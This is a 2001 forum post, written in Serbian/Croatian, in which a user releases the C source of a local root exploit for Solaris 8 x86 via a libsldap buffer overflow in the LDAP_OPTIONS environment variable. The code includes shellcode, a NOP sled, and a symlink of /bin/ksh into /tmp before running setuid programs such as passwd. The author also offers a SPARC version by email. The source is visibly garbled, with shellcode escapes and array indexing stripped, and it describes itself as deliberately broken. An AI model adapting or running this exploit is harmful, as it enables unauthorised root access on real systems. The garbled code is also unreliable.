[ slash @ 17.07.2001. 12:53 ] @
Inace svoje exploite drzim za sebe ali ovoga sam udlucio releasati. http://anti.security.is Napisao sam i exploit za SPARC pa koga zanima neka me maila. /* * Local Solaris 8 (x86) libsldap Exploit * by slash <[email protected]> * * argv[1] can be passwd, yppasswd, nispasswd, sendmail * chkey etc. Use the ldd command to find more programs * that are linked agains libsldap library. Maybee it would * be a good idea to play with the overflow egg by changing * the buffer size or RETPOS. * * Word up to Adam Beyer, Cris Liebing and Gayle San that * played @ Rotor 2001 - Experience * * PRIVATE !!! DO NOT DISTRIBUTE !!! PRIVATE !!! * * *note* slightly broken for public */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define SIZE 331 #define NOP 0x90 #define RETPOS 251 #define ENV "LDAP_OPTIONS" char shellcode[] = "xebx1cx5ex33xc0x33xdbxb3x08xfexc3x2bxf3x88x06" "x6ax06x50xb0x88x9axffxffxffxffx07xeexebx06x90" "xe8xdfxffxffxffx55x8bxecx83xecx08xebx5dx33xc0" "xb0x3axfexc0xebx16xc3x33xc0x40xebx10xc3x5ex33" "xdbx89x5ex01xc6x46x05x07x88x7ex06xebx05xe8xec" "xffxffxffx9axffxffxffxffx0fx0fxc3x5ex33xc0x89" "x76x08x88x46x07x33xd2xb2x06x02xd2x89x04x16x50" "x8dx46x08x50x8bx46x08x50xe8xb5xffxffxffx33xd2" "xb2x06x02xd2x03xe2x6ax01xe8xafxffxffxffx83xc4" "x04xe8xc9xffxffxffx2fx74x6dx70x2fx78x78"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } int main (int argc, char *argv[]) { char buffer[SIZE]; char *program; int i, offset; unsigned long ret; if (argc < 2) { printf ("Usage: %s </path/to/program> <offset> <ret>n", argv[0]); } printf ("Local Solaris 8 (x86) libsldap Exploitn"); printf ("by slash <[email protected]>nn"); offset = atoi(argv[2]); program = atoi(argv[1]); if (argc < 3) { ret = get_sp(); } else { ret = argv[3]; //sanity cheq if(!(ret & 0xff) | | !(ret & 0xff00) | | !(ret & 0xff0000) | | !(ret & 0xff000000)) { printf("Your return address contains a zero-byte !"); exit(EXIT_FAILURE); } } for (i = 0; i < 250 - strlen(shellcode); i++) { *buffer = NOP; } for (i = 250 - strlen(shellcode); i < 250; i++) { *buffer = shellcode; } for (i = RETPOS; i < SIZE; i = i + 4) { *(long *)&buffer = ret + offset; } printf ("Offset [%d] - Return Address [0x%x]n", offset, ret + offset); system ("/bin/ln -s /bin/ksh /tmp/xx"); setenv (ENV, buffer, 1); execl (program, "1337", 0); } |